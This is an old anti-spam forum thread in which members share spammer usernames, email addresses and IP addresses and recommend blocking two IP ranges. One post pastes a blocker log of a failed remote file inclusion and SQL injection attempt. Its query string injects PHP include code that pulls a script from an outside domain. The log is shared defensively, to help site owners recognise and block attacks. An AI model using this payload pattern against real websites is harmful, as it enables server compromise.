Not Subtle

Alessandra · 2010-02-19 1:13 pm

Boy, I didn't even have to look up this one:

PornDownload
porndownload@mail.ru
188.92.74.81

(By the way, I think it's the same entity as:

masterthomas
masterthomas@mail.ru
94.142.131.180
)

computerforumz · 2010-02-19 11:39 pm

True. Some spammers just make it too easy for us to identify and ban them.

MysteryFCM · 2010-02-20 12:28 am

I'd strongly urge you block both at the range level.

94.142.128.0/21 = CSSGROUP (known criminals)
188.92.74.0/24 = Latvian ISP known for spam

EOC_Jason · 2010-02-23 12:23 pm

I got one with a username & email something like "LesbianPorn"... That wasn't blatantly obvious... *rolleyes*

Spud · 2010-02-23 2:20 pm

I have yet to see 'Palmela Wristaction' being used

zaphod · 2010-02-23 2:29 pm

Strange, but the lesbos angle is getting played alot more. Witness this (miserably failed) RFI attempt.

#: 20769 @: Tue, 23 Feb 2010 10:31:56 -0700
Host: neptune.ausip.net.au
IP: 202.60.90.76
Score: 13
Why blocked: RFI attack/SQL injection (nested percent and '). General CMS/RFI attack. General CMS/RFI attack. General CMS attack. Question mark at end of query. Badly formed query, must not have 2 question marks in a row. Badly formed query, must not have 3 question marks in a row even with escaping. RFI (http). Globvar hack. Nesting attack. no access allowed from Korea. Site does NOT use server path_info. Errant path attempting a remote file include. 
Query: name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%2527.include($_GET[a]),exit.%2527&a=http://www.lesbiansexst0ry.tv/linkex/byz9991.txt???
Referer: 
User Agent: Mozilla/5.0
Reconstructed URL: http:// www.spambotsecurity.com /blog/archives/cat_rbn.php//index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%2527.include($_GET[a]),exit.%2527&a=http://www.lesbiansexst0ry.tv/linkex/byz9991.txt???

Looks to me like the dragon is eating it's own tail there! Infecting smut site link exchanges (0 for o substitution to break URL) to distribute botscripts.

What a mess, eh?

Zap

Alessandra · 2010-02-24 10:46 am

Thanks, Steven, for
"I'd strongly urge you block both at the range level.

94.142.128.0/21 = CSSGROUP (known criminals)
188.92.74.0/24 = Latvian ISP known for spam"

Oddly enough, I'd already blocked the first range on a hunch and a bunch of attempted registrations. Thanks to you I just blocked the second one, which I note had one try on our forum.

ih8spam · 2010-02-24 12:22 pm

showed up on my board this morning lol

Guest 75.92.144.113 Wed Feb 24, 2010 3:46 am
Username: Sex Pics
E-mail: sex.picsnow@gmail.com

jokeroo essex · 2010-02-24 6:11 pm

ih8spam wrote:

showed up on my board this morning lol
Guest 75.92.144.113 Wed Feb 24, 2010 3:46 am
Username: Sex Pics
E-mail: sex.picsnow@gmail.com

Yep,LOL,he tried us too.
Checking the database he's been reported 42 times so far.
40 times by that login and 2 by lesbian porn.
If he's going to hit that hard you'd think he'd use some brains LOL

#1 2010-02-19 1:13 pm

Not Subtle

#2 2010-02-19 11:39 pm

Re: Not Subtle

#3 2010-02-20 12:28 am

Re: Not Subtle

#4 2010-02-23 12:23 pm

Re: Not Subtle

#5 2010-02-23 2:20 pm

Re: Not Subtle

#6 2010-02-23 2:29 pm

Re: Not Subtle

#7 2010-02-24 10:46 am

Re: Not Subtle

#8 2010-02-24 12:22 pm

Re: Not Subtle

#9 2010-02-24 6:11 pm

Re: Not Subtle

Board footer